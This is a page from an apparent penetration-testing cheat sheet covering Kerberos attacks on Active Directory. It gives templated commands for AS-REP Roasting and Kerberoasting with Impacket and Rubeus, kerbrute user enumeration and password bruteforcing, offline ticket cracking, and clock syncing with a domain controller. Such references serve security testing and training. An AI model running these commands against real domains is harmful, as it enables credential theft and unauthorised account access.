d4Rk's 1337 h4x0r guide
About me
Search…
Introduction
Reconnaissance
Recon
OSINT
Enumeration
Network discovery
Port scanning
Webserver scanning
Exploit detection
Fuzzing
Process monitoring
Exploitation
Shells
Passwords
Web
Buffer overflow
Misc
Privilege escalation
Linux
Windows
Post exploitation
Loot
Pivoting
Standalone Tools
Services
TCP
TCP 21: FTP
TCP 22: SSH
TCP 23: Telnet
TCP 25, 587: SMTP
TCP 53: DNS
TCP 80, 443: HTTP(S)
TCP 88: Kerberos
TCP 110, 995: POP3(S)
TCP 111: rpcbind
TCP 135: MSRPC
TCP 139, 445: NetBIOS, SMB
TCP 143, 993: IMAP(S)
TCP 389, 636, 3268, 3269: LDAP
TCP 1433, UDP 1434: MSSQL Server
TCP 2049: NFS
TCP 3306: MySQL
TCP 3389: RDP
TCP 5985: WinRM
TCP 6379: Redis
TCP 27017: MongoDB
UDP
Misc
File transfer
Overview
Wget
Pure-FTPd
TFTP
VBScript: Wget clone
Misc
Bash
Burp Suite
Crypto
Ebowla
Firefox extensions
Impacket
Memory forensics
Metasploit Framework (MSF)
MITM
Msfvenom
Pass the Hash (PTH)
PowerShell
PowerShell on Linux
Wireshark
Wordlists and dictionaries
Bug Bounty
Platforms
Tools
Powered By GitBook
TCP 88: Kerberos
Kerberos is a computer-network authentication protocol that works on the basis of tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner.
-- Wikipedia​

Related

AS-REP Roasting

If Kerberos preauthentication is disabled for a user, the Key Distribution Center (KDC) just issues a Ticket Granting Ticket (TGT) for any user we request (AS_REQ). Part of the reply (AS_REP) is encryted using the users password, and can then be cracked offline.

Requirements

  • Only works on user accounts that have Kerberos preauthentication disabled
  • List of potential usernames (may be queried from LDAP using a domain account)

Impacket

GetNPUsers.py <domain>/<username> -dc-ip <ip>

Rubeus

Rubeus.exe asreproast /user:<username> /dc:<ip> /domain:<domain> /outfile:hashes.txt /format:hashcat

kerbrute

A tool to perform Kerberos pre-auth bruteforcing GitHub - ropnop/kerbrute​
Enumerate users
./kerbrute_linux_386 userenum -d <domain> --dc <domaincontroller> <usernames.txt>
bruteforce password of one user
./kerbrute_linux_386 bruteuser -d <domain> --dc <domaincontroller> <password-list> <[email protected]>

Kerberoasting

If we have access to any user account on the domain, we can request (TGS_REQ) Ticket Granting Service (TGS) tickets for any service account (using SPN). The reply (TGS_REP) contains the TGS, encrypted with the service accounts password, that can then be cracked offline.

Requirements

  • Only works on service accounts that have a Service Principal Name (SPN) set
  • Creds/User account on the domain (low priv is sufficient)

Impacket

GetUserSPNs <domain>/<username> -dc-ip <ip> -request

Rubeus

TODO

kerberoast

sudo apt install kerberoast
Use exported tickets from Mimikatz​
python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <exported-tickets-file>

Sync time

It's necessary to sync the client time to the domain controller.
Error (when not synced)
SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate

ntpdate <dc-ip>

Manually

Get server time
nmap -sC -sV <ip>
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-20T00:14:12
|_ start_date: N/A
Set local time accordingly
date -s "20 Mar 2020 00:14:12+00:00"
Previous
TCP 80, 443: HTTP(S)
Next
TCP 110, 995: POP3(S)
Last modified 5mo ago
Copy link
Edit on GitHub
Outline
Related
AS-REP Roasting
Requirements
Impacket
Rubeus
kerbrute
Kerberoasting
Requirements
Impacket
Rubeus
kerberoast
Sync time
ntpdate
Manually